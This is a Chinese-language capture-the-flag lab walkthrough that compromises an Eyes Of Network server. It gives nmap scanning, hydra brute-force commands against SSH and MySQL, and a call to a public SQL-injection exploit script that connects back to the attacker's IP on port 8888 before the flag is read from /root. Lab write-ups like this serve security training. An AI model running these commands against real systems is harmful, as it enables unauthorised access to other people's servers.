0x00 初识

环境

靶机 IP:192.168.111.113

Kali IP:192.168.111.111

WEB界面

0x01 信息收集

端口扫描

使用kali查看目标机端口开放情况

1
nmap -sV -T4 192.168.111.113

目标机开放端口有22、80、111、443、3306、8086

Apache 2.4.6版本

PHP 5.4.16

目录扫描

使用了御剑、dirbuster对目录进行扫描依然无有效信息

0x02 渗透

对22端口ssh服务进行弱密码爆破

1
hydra -l root -P /home/shawn/PasswordDic/top100_ssh_vps.txt -V -t 4 ssh://192.168.111.113

ssh弱密码爆破无果

对3306端口Mysql服务进行弱密码爆破

1
hydra -l root -P /home/shawn/PasswordDic/top1000.txt 192.168.111.113 mysql  

mysql弱密码爆破无果

对登陆框抓包进行手注测试以及跑sqlmap依然无果。

网络搜索可利用脚本

回到登陆框,大大的Eyes Of Network

Github搜索可利用脚本–>eyesofnetwork

找到可利用脚本

Eyes Of Network 版本为5.1到5.3的可利用,通过仅有的登陆页面无法进行判断,但是….可通过靶机登陆页面看到(物理外挂最为致命)。

查看描述,并查询资料

Eyes Of Network 5.3版本(API 2.4.2版本)中存在Api SQL注入漏洞。攻击者可利用该漏洞执行多种操作,例如:绕过身份验证。

克隆到本地并进行解压

执行脚本

1
sudo ./eonrence.py https://192.168.111.113 -ip 192.168.111.111 -port 8888

翻找目录,在root目录下发现flag.txt文件,查看文件